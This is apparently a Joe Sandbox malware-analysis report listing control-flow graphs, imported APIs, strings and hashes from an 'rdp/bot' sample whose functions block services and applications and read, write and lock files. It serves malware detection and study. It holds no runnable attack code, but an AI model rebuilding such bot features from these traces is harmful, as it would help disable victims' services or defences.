7ff64b93924d-7ff64b939252 171->178 172->151 173->151 179 7ff64b939139-7ff64b93913e 174->179 180 7ff64b939225-7ff64b93922a 174->180 175->151 176->151 177->151 178->151 179->151 180->151
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$Free$BuildCriticalLibraryProcessSection$AddressAllocCopyDescriptorEnterFileLeaveLoadLocalProcSecurityTrusteeWithfflushfwritestrcmpstrlen
                                                                                                                  • String ID: RtlAnsiStringToUnicodeString$RtlCopyMemory$RtlCreateServiceSid$RtlFreeUnicodeString$RtlZeroMemory$[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> RtlAnsiStringToUnicodeString failed(res=%08lx)$[E] (%s) -> RtlCreateServiceSid failed(res=%08lx)$[I] (%s) -> Done(svc_name=%s)$block_svc$mem_alloc$ntdll.dll$svc
                                                                                                                  • API String ID: 3039259412-1782951725
                                                                                                                  • Opcode ID: 085100755b162324d195efedc5dcc3635e9143eb137912d90151acc8889682c7
                                                                                                                  • Instruction ID: 30566b62184caa70c9b6bcabb0481af6f9fcfde055c1389941aab13a68de6f83
                                                                                                                  • Opcode Fuzzy Hash: 085100755b162324d195efedc5dcc3635e9143eb137912d90151acc8889682c7
                                                                                                                  • Instruction Fuzzy Hash: 1ED14E21A0CA8385FB60BB55E8843BA6250AF9E344F505036DA9EC6FB7DF7DE845C701
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$Process$CloseFullHandleImageNameNextOpenProcess32Querystrcmp
                                                                                                                  • String ID: [E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> OpenProcess failed(szExeFile=%s,gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> QueryFullProcessImageNameW failed(gle=%lu)$[I] (%s) -> Done(szExeFile=%s,th32ProcessID=%d)$app$block_app
                                                                                                                  • API String ID: 1025937399-1899507746
                                                                                                                  • Opcode ID: 1ed3de061666447cae0baa0fc6ff6d421445239b67af7976eba0ec9335f99bcd
                                                                                                                  • Instruction ID: b519649e64c151574be1daab39afd773dd7ad259e4f67dc04b382352114ac69a
                                                                                                                  • Opcode Fuzzy Hash: 1ed3de061666447cae0baa0fc6ff6d421445239b67af7976eba0ec9335f99bcd
                                                                                                                  • Instruction Fuzzy Hash: 48F10061E1C61382FB707754E4D43BC1291AB8F358F256132C61ECAAFBCE7DA8859706

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3714283218-0
                                                                                                                  • Opcode ID: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
                                                                                                                  • Instruction ID: 3dc7a8ca65c935955d7d53130d4a32c8849f47c59e0e97e247bb47102a333fbc
                                                                                                                  • Opcode Fuzzy Hash: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
                                                                                                                  • Instruction Fuzzy Hash: 19512865A0CA5689FB50BB66E8502B923A0AF4FB94F049535CD2DC77B3DE2CE8518740

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 0 7ff64b9345d5-7ff64b9345f1 1 7ff64b934687-7ff64b9346b5 call 7ff64b9314e2 0->1 2 7ff64b9345f7-7ff64b9345fa 0->2 12 7ff64b934b39-7ff64b934b4a 1->12 4 7ff64b9346ba-7ff64b9346e8 call 7ff64b9314e2 2->4 5 7ff64b934600-7ff64b934604 2->5 4->12 8 7ff64b934606-7ff64b93460a 5->8 9 7ff64b934610-7ff64b934625 fopen 5->9 8->9 14 7ff64b9346ed-7ff64b93471b call 7ff64b9314e2 8->14 10 7ff64b93462b-7ff64b934640 fseek 9->10 11 7ff64b934720-7ff64b934749 _errno call 7ff64b9314e2 _errno 9->11 16 7ff64b934646-7ff64b93466f _errno call 7ff64b9314e2 _errno 10->16 17 7ff64b9347f3-7ff64b934800 call 7ff64b9404e8 10->17 27 7ff64b93474b-7ff64b934758 11->27 28 7ff64b93478f-7ff64b9347a3 _errno 11->28 18 7ff64b934b4c 12->18 19 7ff64b934b53-7ff64b934b60 12->19 14->12 32 7ff64b9347da-7ff64b9347ee _errno 16->32 33 7ff64b934675-7ff64b934682 16->33 36 7ff64b93482b-7ff64b934854 _errno call 7ff64b9314e2 _errno 17->36 37 7ff64b934802 17->37 18->19 23 7ff64b934b99-7ff64b934ba0 19->23 24 7ff64b934b62-7ff64b934b73 call 7ff64b9314e2 19->24 23->24 35 7ff64b934b78-7ff64b934b8a 24->35 27->28 34 7ff64b934b28-7ff64b934b2b 28->34 32->34 33->1 38 7ff64b934b2d-7ff64b934b30 fclose 34->38 39 7ff64b934b35-7ff64b934b37 34->39 47 7ff64b934856-7ff64b934863 36->47 48 7ff64b93489a-7ff64b9348ae _errno 36->48 40 7ff64b934808-7ff64b93480d 37->40 41 7ff64b934b23 37->41 38->39 39->12 43 7ff64b934ba2-7ff64b934bbb call 7ff64b9314e2 39->43 44 7ff64b9348b3-7ff64b9348cb fseek 40->44 45 7ff64b934813-7ff64b934818 40->45 41->34 43->35 49 7ff64b9348cd-7ff64b9348d9 44->49 50 7ff64b934941-7ff64b93496a _errno call 7ff64b9314e2 _errno 44->50 45->44 52 7ff64b93481e-7ff64b934826 45->52 47->48 48->34 53 7ff64b9349c9-7ff64b9349eb GetProcessHeap HeapAlloc 49->53 54 7ff64b9348df-7ff64b9348e5 49->54 63 7ff64b93496c-7ff64b934979 50->63 64 7ff64b9349b0-7ff64b9349c4 _errno 50->64 52->34 53->54 57 7ff64b9349f1-7ff64b934a07 call 7ff64b9314e2 53->57 58 7ff64b9348eb 54->58 59 7ff64b934b92-7ff64b934b97 54->59 57->54 62 7ff64b9348f0-7ff64b9348ff 58->62 59->34 66 7ff64b934a9e-7ff64b934aa7 62->66 67 7ff64b934905-7ff64b934907 62->67 63->64 64->34 69 7ff64b934aa9-7ff64b934aab 66->69 70 7ff64b934acf-7ff64b934af2 call 7ff64b9314e2 66->70 67->66 68 7ff64b93490d-7ff64b934930 fread 67->68 68->66 72 7ff64b934936 68->72 73 7ff64b934aad-7ff64b934ab2 69->73 74 7ff64b934af4-7ff64b934af9 69->74 70->73 78 7ff64b934a0c-7ff64b934a35 _errno call 7ff64b9314e2 _errno 72->78 79 7ff64b93493c-7ff64b93493f 72->79 73->34 80 7ff64b934ab4-7ff64b934acd GetProcessHeap HeapFree 73->80 76 7ff64b934afb-7ff64b934b01 74->76 77 7ff64b934b03-7ff64b934b0c 74->77 76->34 77->76 83 7ff64b934a37-7ff64b934a44 78->83 84 7ff64b934a7b-7ff64b934a8f _errno 78->84 79->62 80->34 83->84 84->62
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _errno$fclosefflushfopenfseekfwrite
                                                                                                                  • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                                                                                                                  • API String ID: 2897271634-4120527733
                                                                                                                  • Opcode ID: f9c10c2996a5af623a9f831bd9c4aaf4b69e569eb9c4efce4151118f17c367f6
                                                                                                                  • Instruction ID: 81a2b335ac485163e22f98ceb562471a06acef14b7598db94a5f3e89dfaa8f02
                                                                                                                  • Opcode Fuzzy Hash: f9c10c2996a5af623a9f831bd9c4aaf4b69e569eb9c4efce4151118f17c367f6
                                                                                                                  • Instruction Fuzzy Hash: 72D16E21A0CA4791FA20BBA9E8407B83361BF4E795F566532D91DD7BB7EE3CE4458300

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _errno$fopenfwrite
                                                                                                                  • String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                                                                                                                  • API String ID: 1336347884-544371937
                                                                                                                  • Opcode ID: fd71ba3db7f327798de58cdc59b1f8f8ea9ece55cf0b0fbe97b514d8da62ca52
                                                                                                                  • Instruction ID: e8e123277b6c20afda5b046e08f7582b78b1f61d2a23535596366ce8c60a9f59
                                                                                                                  • Opcode Fuzzy Hash: fd71ba3db7f327798de58cdc59b1f8f8ea9ece55cf0b0fbe97b514d8da62ca52
                                                                                                                  • Instruction Fuzzy Hash: 9E518361A0C64792FA10BB69D9402B863A1BF4F794F591136D92DC7BB7DF3CE5468300

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 375 7ff64b93168c-7ff64b9316b4 InitializeCriticalSectionAndSpinCount 376 7ff64b9316ba-7ff64b9316ee call 7ff64b9319c0 call 7ff64b936b9b 375->376 377 7ff64b9317e0-7ff64b931801 GetLastError call 7ff64b9314e2 375->377 390 7ff64b9317b9-7ff64b9317d1 call 7ff64b9314e2 376->390 391 7ff64b9316f4-7ff64b93170b strlen 376->391 382 7ff64b931822-7ff64b931828 377->382 383 7ff64b931803 377->383 388 7ff64b9318eb 382->388 389 7ff64b93182e-7ff64b931834 382->389 385 7ff64b931809-7ff64b931816 383->385 386 7ff64b9318e1-7ff64b9318e6 383->386 385->382 386->390 399 7ff64b9318f5-7ff64b9318fa 388->399 392 7ff64b931836-7ff64b93183c 389->392 393 7ff64b931860-7ff64b931863 389->393 404 7ff64b9317d6-7ff64b9317df 390->404 395 7ff64b93170d-7ff64b931710 391->395 396 7ff64b931723-7ff64b931726 391->396 397 7ff64b931909-7ff64b93190e 392->397 398 7ff64b931842-7ff64b931848 392->398 400 7ff64b93187d-7ff64b931883 393->400 401 7ff64b931865-7ff64b931868 393->401 395->396 405 7ff64b931712-7ff64b93171f strlen 395->405 408 7ff64b931748-7ff64b931791 strlen fopen 396->408 409 7ff64b931728-7ff64b931742 strcat strlen 396->409 397->390 406 7ff64b93184e-7ff64b931854 398->406 407 7ff64b931913-7ff64b931918 398->407 399->390 402 7ff64b9318ff 400->402 403 7ff64b931885-7ff64b93188a 400->403 410 7ff64b9318d7 401->410 411 7ff64b93186a-7ff64b93186d 401->411 402->397 403->390 405->396 412 7ff64b931856-7ff64b93185b 406->412 413 7ff64b93188f-7ff64b931894 406->413 407->390 414 7ff64b931797-7ff64b9317b3 call 7ff64b9314e2 408->414 415 7ff64b9318ad-7ff64b9318c8 call 7ff64b9314e2 408->415 409->408 410->386 411->399 416 7ff64b931873-7ff64b931878 411->416 412->390 413->390 414->390 421 7ff64b93191d-7ff64b931937 call 7ff64b9314e2 414->421 415->390 416->390 421->404
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$wfpblk.l
                                                                                                                  • API String ID: 3395718042-2291025694
                                                                                                                  • Opcode ID: 8162a81c9e43a89fbec366be30bd812177f940d51fad0d5cb0870f2ffc37eb56
                                                                                                                  • Instruction ID: e7a632816aadbf9ce3f4de83c2151091d24bdab7aa8f48373ef0a512a892ad05
                                                                                                                  • Opcode Fuzzy Hash: 8162a81c9e43a89fbec366be30bd812177f940d51fad0d5cb0870f2ffc37eb56
                                                                                                                  • Instruction Fuzzy Hash: 52512C50E1C72791FA24BB51E8803B82395AF0F744F546132C61EC6AB3DF6CB996C351

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 424 7ff64b935e6f-7ff64b935e80 425 7ff64b935e86-7ff64b935e89 424->425 426 7ff64b935f72-7ff64b935fa0 call 7ff64b9314e2 424->426 428 7ff64b935e8f-7ff64b935ed4 CreateFileA 425->428 429 7ff64b935fa2-7ff64b935fd0 call 7ff64b9314e2 425->429 434 7ff64b935f32-7ff64b935f35 426->434 432 7ff64b935eda-7ff64b935f08 LockFileEx 428->432 433 7ff64b935fd5-7ff64b935ff9 GetLastError call 7ff64b9314e2 428->433 429->434 437 7ff64b9360ba-7ff64b9360de GetLastError call 7ff64b9314e2 432->437 438 7ff64b935f0e-7ff64b935f21 432->438 446 7ff64b935ffb 433->446 447 7ff64b936013-7ff64b936019 433->447 443 7ff64b935f37 434->443 444 7ff64b935f3e-7ff64b935f4b 434->444 451 7ff64b9360f8-7ff64b9360fe 437->451 452 7ff64b9360e0 437->452 441 7ff64b935f27-7ff64b935f2c 438->441 442 7ff64b93622b-7ff64b93622e CloseHandle 438->442 441->434 448 7ff64b936245-7ff64b93625e call 7ff64b9314e2 441->448 449 7ff64b936239 442->449 443->444 444->449 450 7ff64b935f51-7ff64b935f62 call 7ff64b9314e2 444->450 454 7ff64b9360b0 446->454 455 7ff64b936001-7ff64b93600e 446->455 456 7ff64b9361a9 447->456 457 7ff64b93601f-7ff64b936025 447->457 466 7ff64b935f67-7ff64b935f71 448->466 449->448 450->466 461 7ff64b9361ef 451->461 462 7ff64b936104-7ff64b93610a 451->462 459 7ff64b9360e6-7ff64b9360f3 452->459 460 7ff64b936195 452->460 454->437 455->447 471 7ff64b9361b3 456->471 464 7ff64b936027-7ff64b93602d 457->464 465 7ff64b936051-7ff64b936054 457->465 459->451 460->456 479 7ff64b9361f9 461->479 469 7ff64b93610c-7ff64b93610f 462->469 470 7ff64b936143-7ff64b936149 462->470 472 7ff64b9361d1 464->472 473 7ff64b936033-7ff64b936039 464->473 467 7ff64b936056-7ff64b936059 465->467 468 7ff64b936072-7ff64b936078 465->468 467->471 478 7ff64b93605f-7ff64b936062 467->478 482 7ff64b9361c7 468->482 483 7ff64b93607e 468->483 480 7ff64b93612d-7ff64b936133 469->480 481 7ff64b936111-7ff64b936114 469->481 474 7ff64b936217 470->474 475 7ff64b93614f-7ff64b936155 470->475 489 7ff64b9361bd 471->489 476 7ff64b9361db 472->476 473->476 477 7ff64b93603f-7ff64b936045 473->477 485 7ff64b936221 474->485 484 7ff64b93615b-7ff64b936161 475->484 475->485 476->461 486 7ff64b936088 477->486 487 7ff64b936047 477->487 488 7ff64b936068 478->488 478->489 493 7ff64b936203 479->493 491 7ff64b936139 480->491 492 7ff64b93620d 480->492 481->479 490 7ff64b93611a-7ff64b93611d 481->490 482->472 483->486 495 7ff64b93616d 484->495 496 7ff64b936163 484->496 485->442 486->454 487->465 488->468 489->482 490->493 494 7ff64b936123 490->494 491->470 492->474 493->492 494->480 495->460 496->495
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleLock
                                                                                                                  • String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock
                                                                                                                  • API String ID: 2747014929-530486279
                                                                                                                  • Opcode ID: e4f34f73a7c2b9193ad35b742d97c622cba79fc7e1d163be5dbedb326e79ab52
                                                                                                                  • Instruction ID: 8dd153065c5a055fdee4c7124b6bbc912d31e6164c0b551128ced1401f3d70a5
                                                                                                                  • Opcode Fuzzy Hash: e4f34f73a7c2b9193ad35b742d97c622cba79fc7e1d163be5dbedb326e79ab52
                                                                                                                  • Instruction Fuzzy Hash: 2E813E60E0C74A81FA70B754E44477832505F5F358F646232DD6EC7AF3EE6EA9858342

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 497 7ff64b9397f2-7ff64b939814 498 7ff64b93981a-7ff64b93982d call 7ff64b9345d5 497->498 499 7ff64b9398a5-7ff64b9398d3 call 7ff64b9314e2 497->499 504 7ff64b939833-7ff64b93983b 498->504 505 7ff64b9398d8-7ff64b9398e0 498->505 499->504 508 7ff64b93983d-7ff64b93984e GetProcessHeap HeapFree 504->508 509 7ff64b939854-7ff64b939856 504->509 506 7ff64b9398e6-7ff64b939900 505->506 507 7ff64b939b7e-7ff64b939b83 505->507 510 7ff64b939933-7ff64b93993a 506->510 507->504 508->509 511 7ff64b93985c-7ff64b93985f 509->511 512 7ff64b939b9e-7ff64b939baf call 7ff64b9314e2 509->512 516 7ff64b93995d-7ff64b939998 GetProcessHeap HeapAlloc 510->516 517 7ff64b93993c-7ff64b93993f 510->517 513 7ff64b939869-7ff64b939876 511->513 514 7ff64b939861 511->514 520 7ff64b939bb4 call 7ff64b9314e2 512->520 521 7ff64b93987c-7ff64b9398a4 call 7ff64b9314e2 513->521 522 7ff64b939b92 513->522 514->513 518 7ff64b93999a-7ff64b9399a1 516->518 519 7ff64b9399d0-7ff64b9399e6 call 7ff64b9314e2 516->519 517->516 523 7ff64b939941-7ff64b939947 517->523 526 7ff64b939b88-7ff64b939b8d 518->526 527 7ff64b9399a7-7ff64b9399ce 518->527 519->518 522->512 524 7ff64b939949 523->524 525 7ff64b939918-7ff64b93991b 523->525 531 7ff64b93994b-7ff64b93994e 524->531 532 7ff64b939902-7ff64b939905 524->532 535 7ff64b93991d-7ff64b939927 525->535 536 7ff64b93992f 525->536 526->504 533 7ff64b939a2a-7ff64b939a37 527->533 537 7ff64b939929 531->537 538 7ff64b939950-7ff64b939953 531->538 532->536 540 7ff64b939907-7ff64b93990a 532->540 533->504 539 7ff64b939a3d-7ff64b939a40 533->539 535->536 536->510 537->536 538->536 541 7ff64b939955-7ff64b93995b 538->541 539->504 542 7ff64b939a46-7ff64b939a4b 539->542 540->536 543 7ff64b93990c-7ff64b939916 540->543 541->536 544 7ff64b939a51-7ff64b939a53 542->544 545 7ff64b939b6e-7ff64b939b74 542->545 543->536 546 7ff64b9399e8-7ff64b9399eb 544->546 547 7ff64b939a55-7ff64b939a57 544->547 545->507 549 7ff64b939a26 546->549 550 7ff64b9399ed-7ff64b9399f1 546->550 548 7ff64b939a59-7ff64b939a5c 547->548 547->549 551 7ff64b939a1c-7ff64b939a20 548->551 552 7ff64b939a5e-7ff64b939a61 548->552 549->533 550->549 551->549 553 7ff64b9399f3-7ff64b939a11 call 7ff64b939770 552->553 554 7ff64b939a63-7ff64b939aa2 call 7ff64b939770 * 2 552->554 553->551 560 7ff64b939a13-7ff64b939a16 553->560 554->551 564 7ff64b939aa8-7ff64b939aad 554->564 560->551 561 7ff64b939af8-7ff64b939b00 560->561 561->551 563 7ff64b939b06-7ff64b939b09 561->563 565 7ff64b939b59-7ff64b939b6c 563->565 566 7ff64b939b0b-7ff64b939b21 563->566 564->551 567 7ff64b939ab3-7ff64b939af3 strncpy * 2 564->567 568 7ff64b939b28-7ff64b939b54 strncpy 565->568 566->568 567->551 568->551
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                                                                                                                  • String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
                                                                                                                  • API String ID: 1423203057-2746879330
                                                                                                                  • Opcode ID: e29854694c0f8539840e8829ac9a0304c53863f31d6bfdd38f35223ef1fc52e9
                                                                                                                  • Instruction ID: 78edd87c12636b3472bcb1091c63762bfce7a2ae4a8d4327f60d0f8a2a5731be
                                                                                                                  • Opcode Fuzzy Hash: e29854694c0f8539840e8829ac9a0304c53863f31d6bfdd38f35223ef1fc52e9
